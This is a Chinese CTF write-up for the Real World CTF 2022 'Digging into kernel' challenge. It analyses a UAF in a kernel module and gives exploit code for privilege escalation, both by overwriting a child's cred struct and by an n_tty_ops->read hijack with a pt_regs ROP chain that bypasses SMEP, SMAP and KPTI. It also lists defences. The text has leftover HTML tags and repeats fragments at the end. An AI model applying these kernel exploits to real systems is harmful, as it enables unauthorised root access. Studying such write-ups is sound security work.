Real World CTF 2022 高校赛 Digging into kernel 漏洞分析与利用<\/h1>

0x00 题目概述<\/h2>
这道题目来自Real World CTF 2022高校赛，是一个内核模块漏洞利用题目。题目提供了一个存在漏洞的内核模块`xkmod.ko<\/code>，攻击者需要通过该模块的漏洞实现提权。<\/p>`

0x01 环境配置<\/h2>
启动脚本如下：<\/p>
qemu-system-x86_64 \
<\/span><\/span><\/span><\/span>    -kernel bzImage \
<\/span><\/span><\/span><\/span>    -initrd rootfs.cpio \
<\/span><\/span><\/span><\/span>    -append "console=ttyS0 root=\/dev\/ram rdinit=\/sbin\/init quiet kalsr"<\/span> \
<\/span><\/span><\/span><\/span>    -cpu kvm64,+smep,+smap \
<\/span><\/span><\/span><\/span>    -monitor null \
<\/span><\/span><\/span><\/span>    --nographic
<\/span><\/span><\/code><\/pre>保护机制：<\/p>

开启了SMEP和SMAP<\/li>
默认开启KASLR（虽然启动参数中写成了kalsr）<\/li>
开启了KPTI（内核页表隔离）<\/li>
<\/ul>
0x02 漏洞分析<\/h2>
内核模块功能<\/h3>
模块加载时会创建一个名为"lalala"的kmem_cache，object大小为192字节：<\/p>
kmem_cache_create("lalala"<\/span>, 192<\/span>, 0<\/span>, 0<\/span>, 0<\/span>);
<\/span><\/span><\/code><\/pre>模块提供了以下功能：<\/p>

分配object<\/li>
编辑object内容<\/li>
读取object内容<\/li>
<\/ol>
使用结构体进行通信：<\/p>
struct<\/span> Data {
<\/span><\/span>    size_t *<\/span>ptr;
<\/span><\/span>    unsigned<\/span> int<\/span> offset;
<\/span><\/span>    unsigned<\/span> int<\/span> length;
<\/span><\/span>};
<\/span><\/span><\/code><\/pre>主要漏洞<\/h3>

UAF漏洞<\/strong>：关闭设备文件时会释放buf指针，但没有将其置NULL，可以通过同时打开多个设备文件来利用这个UAF漏洞。<\/li>
竞争条件<\/strong>：ioctl中的所有操作都没有上锁，可能导致竞争条件。<\/li>
<\/ol>
0x03 漏洞利用方法<\/h2>
解法一：修改子进程cred结构体<\/h3>
原理<\/strong>：<\/p>

由于kmem_cache没有设置特殊flag，会与系统中其他192字节的kmem_cache合并<\/li>
进程的cred结构体也使用相同大小的kmem_cache<\/li>
通过UAF可以修改子进程的cred结构体实现提权<\/li>
<\/ul>
利用步骤<\/strong>：<\/p>

打开两个设备文件<\/li>
分配一个object<\/li>
关闭其中一个设备文件释放object但不置NULL<\/li>
fork创建子进程<\/li>
通过另一个设备文件读取并修改子进程的cred<\/li>
<\/ol>
EXP关键代码<\/strong>：<\/p>
int<\/span> dev_fd[2<\/span>];
<\/span><\/span>for<\/span>(int<\/span> i=<\/span>0<\/span>; i<<\/span>2<\/span>; i++<\/span>) 
<\/span><\/span>    dev_fd[i] =<\/span> open("\/dev\/xkmod"<\/span>, O_RDONLY);
<\/span><\/span>
<\/span><\/span>alloc(dev_fd[0<\/span>]);
<\/span><\/span>close(dev_fd[0<\/span>]);
<\/span><\/span>
<\/span><\/span>int<\/span> pid =<\/span> fork();
<\/span><\/span>if<\/span>(!<\/span>pid) {
<\/span><\/span>    get(dev_fd[1<\/span>], &<\/span>data);
<\/span><\/span>    if<\/span>(((int<\/span> *<\/span>)(data.ptr))[3<\/span>] ==<\/span> 1000<\/span>) {
<\/span><\/span>        for<\/span>(int<\/span> i=<\/span>0<\/span>; i<<\/span>10<\/span>; i++<\/span>) 
<\/span><\/span>            data.ptr[i] =<\/span> 0<\/span>;
<\/span><\/span>        edit(dev_fd[1<\/span>], &<\/span>data);
<\/span><\/span>        if<\/span>(!<\/span>getuid()) {
<\/span><\/span>            system("\/bin\/sh"<\/span>);
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>解法二：劫持n_tty_ops->read实现ROP<\/h3>
原理<\/strong>：<\/p>

利用UAF实现任意地址读写<\/li>
劫持n_tty_ops函数表中的read指针<\/li>
通过read系统调用触发ROP链<\/li>
利用pt_regs结构体布置ROP链<\/li>
<\/ol>
详细利用步骤<\/strong>：<\/p>
Step 1: 实现内核任意地址读写<\/h4>

释放一个object后读取其内容，获取freelist指针<\/li>
修改freelist指针指向目标地址-0x10（前面需要有8字节0）<\/li>
连续分配两次，第二次分配将得到目标地址的object<\/li>
<\/ol>
Step 2: 泄露内核基址<\/h4>

通过freelist指针计算page_offset_base<\/li>
在page_offset_base + 0x9d000处读取secondary_startup_64地址泄露内核基址<\/li>
<\/ol>
Step 3: 劫持n_tty_ops->read<\/h4>

找到n_tty_ops结构体地址（通过搜索函数指针）<\/li>
修改read指针为ROP gadget地址（如add rsp, 0xc8; ret）<\/li>
<\/ol>
Step 4: 布置ROP链<\/h4>
利用pt_regs结构体布置ROP链：<\/p>

r15: pop rdi; ret<\/li>
r14: 0<\/li>
r13: prepare_kernel_cred地址<\/li>
r12: xchg rax, rdi; ret<\/li>
rbp: commit_creds地址<\/li>
rbx: swapgs_restore_regs_and_return_to_usermode地址<\/li>
<\/ul>
Step 5: 触发ROP<\/h4>
通过read系统调用触发n_tty_ops->read，执行ROP链<\/p>
Step 6: 修复n_tty_ops<\/h4>
提权后将n_tty_ops->read恢复为原值，保证shell稳定<\/p>
关键ROP代码<\/strong>：<\/p>
__asm__(
<\/span><\/span>    "mov r15, pop_rdi_ret;"<\/span>
<\/span><\/span>    "xor r14, r14;"<\/span>
<\/span><\/span>    "mov r13, prepare_kernel_cred;"<\/span>
<\/span><\/span>    "mov r12, xchg_rax_rdi_ret;"<\/span>
<\/span><\/span>    "mov rbp, commit_creds;"<\/span>
<\/span><\/span>    "mov rbx, swapgs_restore_regs_and_return_to_usermode;"<\/span>
<\/span><\/span>    "xor rax, rax;"<\/span>
<\/span><\/span>    "mov rcx, 0xaaaaaaaa;"<\/span>
<\/span><\/span>    "mov rdx, 0x8;"<\/span>
<\/span><\/span>    "mov rsi, rsp;"<\/span>
<\/span><\/span>    "xor rdi, rdi;"<\/span>
<\/span><\/span>    "syscall"<\/span>
<\/span><\/span>);
<\/span><\/span><\/code><\/pre>0x04 关键知识点<\/h2>


kmem_cache机制<\/strong>：<\/p>

相同大小且没有特殊flag的kmem_cache会合并<\/li>
cred结构体通常使用通用kmem_cache<\/li>
<\/ul>
<\/li>

n_tty_ops劫持<\/strong>：<\/p>

tty子系统核心结构体<\/li>
read系统调用会调用n_tty_ops->read<\/li>
劫持后可以实现稳定触发<\/li>
<\/ul>
<\/li>

pt_regs利用<\/strong>：<\/p>

系统调用时所有寄存器会被保存到内核栈<\/li>
通过寄存器布置ROP链<\/li>
使用栈迁移gadget跳转到ROP链<\/li>
<\/ul>
<\/li>

KPTI绕过<\/strong>：<\/p>

使用swapgs_restore_regs_and_return_to_usermode返回用户态<\/li>
该函数会完成KPTI相关的页表切换<\/li>
<\/ul>
<\/li>
<\/ol>
0x05 防御措施<\/h2>

设置kmem_cache的flag防止合并<\/li>
对全局指针添加引用计数<\/li>
使用锁保护共享资源<\/li>
开启CONFIG_SLAB_FREELIST_HARDENED保护<\/li>
开启CONFIG_SLAB_FREELIST_RANDOM保护<\/li>
<\/ol>
0x06 总结<\/h2>
这道题目展示了内核漏洞利用的多种技术：<\/p>

通过UAF实现任意地址读写<\/li>
利用内核对象缓存合并特性修改敏感结构体<\/li>
劫持全局函数表控制执行流<\/li>
利用pt_regs结构体布置ROP链<\/li>
绕过SMEP\/SMAP\/KPTI等保护机制<\/li>
<\/ol>
两种解法各有特点，第一种简单直接，第二种更加通用，适用于更严格的防护环境。<\/p>

Real World CTF 2022 高校赛 Digging into kernel 漏洞分析与利用<\/h1>

0x00 题目概述<\/h2> 这道题目来自Real World CTF 2022高校赛，是一个内核模块漏洞利用题目。题目提供了一个存在漏洞的内核模块xkmod.ko<\/code>，攻击者需要通过该模块的漏洞实现提权。<\/p>

0x02 漏洞分析<\/h2>

0x03 漏洞利用方法<\/h2>

Step 5: 触发ROP<\/h4> 通过read系统调用触发n_tty_ops->read，执行ROP链<\/p>

0x00 题目概述<\/h2>
这道题目来自Real World CTF 2022高校赛，是一个内核模块漏洞利用题目。题目提供了一个存在漏洞的内核模块`xkmod.ko<\/code>，攻击者需要通过该模块的漏洞实现提权。<\/p>`

Step 5: 触发ROP<\/h4>
通过read系统调用触发n_tty_ops->read，执行ROP链<\/p>